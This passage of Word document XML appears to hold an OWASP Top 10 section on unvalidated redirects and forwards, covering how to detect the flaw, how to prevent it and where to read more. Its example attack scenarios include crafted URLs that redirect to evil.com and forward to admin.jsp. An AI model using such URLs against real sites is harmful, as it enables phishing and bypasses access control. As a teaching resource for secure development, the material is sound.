        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1830DA7A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253A42EE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47265850" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2516C337" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754BD9C3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EE044C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B27DE8E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Am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Vulnerab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to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Redirection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0391CCAD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a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i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u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validated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B65A938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redirec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war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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56198ECD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1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Revie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dir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war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(called</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8836ED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7"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>a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ransfer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in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.NET).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For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each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use,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identify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if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he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target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URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAFDD84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clud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amet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alues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rget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED1EC5E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UR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n’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alidat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gain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itelist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you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vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16659CB4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2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Also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pid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generat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directs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533974F7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(HTT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spon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d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300-307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ypicall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302)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Loo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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E48FDD2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amet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ppli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ri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direc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</w:p>
    <w:p w14:paraId="313E562E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4"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>they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ppear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o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b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arge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URL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or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piece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of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such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URL.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If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7CE3F9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so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an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R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rge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bserv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th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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3542A950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redirec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e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rget.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59664471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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  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navailabl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he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amet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e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y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C8FD9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>look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like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part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of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a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redirect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or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forward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URL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destination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23232"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510747C8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tes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o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o.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F59963B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE50F5A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="431" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508AD932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b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>Example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Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98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8"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB2369" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="28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1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ha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g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ll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“redirect.jsp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4A6197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whi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ak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ng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amet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name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“url”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</w:p>
    <w:p w14:paraId="0F8EADCF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raf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liciou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R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direc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liciou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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE8A68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erform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hish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stall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malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16009811" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="322" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="3333FF"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://www.example.com/redirect.jsp?url=evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD68763" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="31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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>: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war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ou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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5414B82E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betwe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differ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o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ite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acilit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ome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EAA709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page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ramet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dicat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er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s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houl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be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16D471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sen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f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ransac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successful.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ase,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</w:p>
    <w:p w14:paraId="58E0DA87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raft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UR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a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ill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pa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pplication’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cces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control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452C410A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202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check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ward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dministrative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC7E7DC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>functional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fo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which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th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ttacke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isn’t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23232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>authorized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0916CADA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="319" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="3333FF"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://www.example.com/boring.jsp?fwd=admin.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70BE33" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="623D7C6C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDB2987" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D50844" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74AB0C04" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F8E432" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47573DFC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F1D4FE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70851C6A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA0105C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A06B05" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6536713C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A30381" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CCA5D9B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A75D2F5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452ADE11" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1895FC95" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D07A1C4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D5BA8A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How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Do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I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Prevent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>This?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A620DE8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="289" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Saf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s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f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redirect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nd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forward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a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b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don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i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a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number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBC6BF4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ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D862E0E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1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Simp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voi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direct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orwards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1B4B0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="301" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>If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sed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don’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nvolv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ser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parameters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calculating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he</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599DA977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destination.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a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ual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one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107B18CB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>I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stin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arameter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can’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voided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ns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t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72E010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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>th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supplie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valu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is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>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nd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b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b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>authorize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for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h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ser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0AA81F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>I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is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recommended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that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any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such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destination</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E06CBB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b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pp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value,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athe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a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ctua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R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r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7EFA3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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>portio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of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h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URL,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and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ha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server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sid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cod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23232"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>translate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097138C8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202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th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pp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arge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RL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BFEBC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Applications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can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us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ESAPI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o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override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId649" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="93"/>
            <w:sz w:val="19"/>
          </w:rPr>
          <w:t>sendRedirect()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16886756" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>metho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mak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u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l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redir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destination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afe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F11D72" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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Avoid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such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flaw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extremel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importa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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020351AB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>favorit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arge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of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phisher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ry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o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gai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h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user’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23232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460C9E3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="412" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202DEF39" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="319" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3F1B73" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="299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OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190CD808" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="311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pe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directs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CC868CD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SAPI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WrapperRespons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ndRedirect()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method</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F69354C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122E80A0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="411" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>External</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D092FB4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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5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W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r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601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pe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directs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0477BB00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WASC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URL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6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director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0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buse</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="004DA1BB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="322" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·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Googl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blog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rticl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th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dangers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7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f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pe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79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redirects</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D423549" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="319" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r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0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Top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1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10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2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for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3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.NET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4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article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5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on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6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Unvalidated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7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Redirects</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId688" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
